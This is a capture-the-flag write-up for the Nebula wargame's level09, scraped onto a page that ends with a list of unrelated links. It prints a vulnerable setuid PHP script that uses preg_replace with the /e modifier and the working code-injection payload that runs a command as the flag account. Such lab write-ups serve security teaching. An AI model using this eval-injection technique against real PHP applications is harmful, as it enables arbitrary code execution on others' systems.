Nebula level09
来源:互联网 发布:java公司支出的总薪水 编辑:程序博客网 时间:2024/05/22 05:32
http://exploit-exercises.com/nebula/level09
There's a C setuid wrapper for some vulnerable PHP code...
To do this level, log in as the level09 account with the password level09 . Files for this level can be found in /home/flag09.
1<?php 2 3function spam($email) 4{ 5 $email = preg_replace("/\./", " dot ", $email); 6 $email = preg_replace("/@/", " AT ", $email); 7 8 return $email; 9}1011function markup($filename, $use_me)12{13 $contents = file_get_contents($filename);1415 $contents = preg_replace("/(\[email (.*)\])/e", "spam(\"\\2\")", $contents);16 $contents = preg_replace("/\[/", "<", $contents);17 $contents = preg_replace("/\]/", ">", $contents);1819 return $contents;20}2122$output = markup($argv[1], $argv[2]);2324print $output;2526?>
Well, I must admit that this time all was new to me. Let’s begin!
After initial parsing of the provided PHP script we can gather basic understanding of the logic along with some useful hints (oddly looking $use_me
variable, regular expressions, and this whole preg_replace()
function are most important).
The script works as follows: You provide the file which it tries to open, parse and print. If we want to hit spam()
function we need to provide proper input, which looks like [email foo@bar.com]
:
$ cat ~/pwn.txt
[email foo@bar.com]
$ ./flag09 ~/pwn.txt barfoo
foo AT bar dot com
Now, onto the vulnerability.
If you google preg_replace()
then one of the first hits is this, nothing special but we can understand a little bit better how to properly use this function.
Now, I didn’t have much experience in regular expressions so I read couple of tutorials but the one thing that did struck me was this "/(\[email (.*)\])/e"
regexp, to be specific the letter "e"
after slash. I did not stumbled upon this in any tutorial so I, again, googled it. Lo and behold this is what I found.
So, we already know the core issue here. We only need to connect the dots to craft an exploit.
From the above document and initial hints we do know that the malicious line in ~/pwn.txt
needs to look like [email {${eval($use_me)}}]
. We will use $use_me
variable (that comes from the second argument of our C wrapper) to provide arbitrary PHP code for eval()
. And that should suffice:
$ cat ~/pwn.txt
[email {${eval($use_me)}}]
$ ./flag09 ~/pwn.txt "system(\"/bin/getflag\");"
You have successfully executed getflag on a target account
PHP Notice: Undefined variable: in /home/flag09/flag09.php(15) : regexp code on line 1
Another one bites the dust.
- Nebula level09
- Nebula
- nebula 0
- Nebula level00
- Nebula level01
- Nebula level02
- Nebula level04
- Nebula level03
- Nebula level05
- Nebula level06
- Nebula level07
- Nebula level08
- Nebula level10
- Nebula level11
- Nebula level12
- Nebula level13
- Nebula level14
- Nebula level15
- MFC生成ID
- 黑马程序员_正则表达式
- php操作PDO连接数据库实例
- SQL语句distinct用法
- Invalid result location value/parameter 解决办法
- Nebula level09
- 做互联网电商不得不了解的技术
- Android之GPS定位详解
- 大话排序算法-shell排序
- 第八学 linux内核——内存寻址——段机制(2)
- Visual Studio2010调试技巧
- WAS6默认是不支持struts2的
- JAVA WEB框架的错误体系
- 使用ORACLE索引的一些小技巧